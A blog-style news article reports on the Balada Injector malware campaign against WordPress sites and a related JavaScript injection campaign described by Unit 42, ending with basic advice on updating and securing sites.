1 million WordPress websites infected by the Balada Injector Virus

Since 2017, it’s been reported that over a million WordPress websites have been compromised by a campaign to spread malware known as Balada Injector.

According to GoDaddy’s Sucuri, the extensive campaign “leverages all known and only newly discovered theme and plugin vulnerabilities” to compromise WordPress websites. Every few weeks, the attacks are known to occur in waves.

According to security expert Dmitry Sinegubko, “this campaign is clearly recognisable by its predilection for String.fromCharCode obfuscation, the use of recently registered domain names hosting malicious scripts on random subdomains, and by redirects to numerous scam sites.”

The websites include those that claim to offer false tech support, fake lottery winnings, and malicious CAPTCHA pages that beg users to enable notifications so that the actors may send spam emails.

The study expands on recent discoveries from Doctor Web, which described a family of Linux malware that compromises unprotected WordPress sites by taking use of holes in more than two dozen plugins and themes.

In the intervening years, the Balada Injector has used more than 100 sites and a wide range of techniques to exploit well-known security holes (such as HTML injection and Site URL), with the attackers mostly seeking to steal database credentials from the wp-config.php file.

The assaults are also designed to read or download arbitrary site files, including as backups, database dumps, log and error files, and hunt for tools like adminer and phpmyadmin that might have been left behind by site administrators after performing maintenance activities.

In the end, the malware enables the creation of phoney WordPress admin users, gathers data from the underlying hosts, and leaves backdoors for enduring access.

ALSO READ: An Easy Guide on How to Extract Your Data

In order to find writable folders that belong to other websites, the Balada Injector malware does more extensive searches from top-level directories linked to the compromised website’s file system.

According to Sinegubko, “most frequently, these sites are owned by the webmaster of the hijacked site, and they all share the same server account and file rights.” In this way, it’s possible for one site to be compromised in order to gain access to a number of other sites “for free.”

If these attack routes are blocked, a set of 74 predetermined credentials are used to brute force the admin password. Therefore, it is advised for WordPress users to maintain their website software updated, get rid of unnecessary plugins and themes, and use secure WordPress admin passwords.

The discoveries follow the discovery of a related malicious JavaScript injection campaign by Palo Alto Networks Unit 42 that drives site users to adware and fraud domains. Since 2022, more than 51,000 websites have been impacted.

The activity directs victims to booby-trapped pages that deceive them into allowing push notifications by pretending to be a bogus CAPTCHA check in order to offer misleading material. It also uses String.fromCharCode as an obfuscation technique.

Unit 42 researchers noted that “the injected malicious JavaScript code was present on the homepage of more than half of the discovered websites.” “One typical strategy employed by the campaign’s operators was to inject malicious JS code on commonly used JS filenames (for example, jQuery) that are likely to be present on the homepages of compromised websites,” the researchers wrote.

Since legitimate users are more likely to access the website’s home page, this could aid attackers in identifying and attacking them.

Subscribe to this blog and follow us on facebook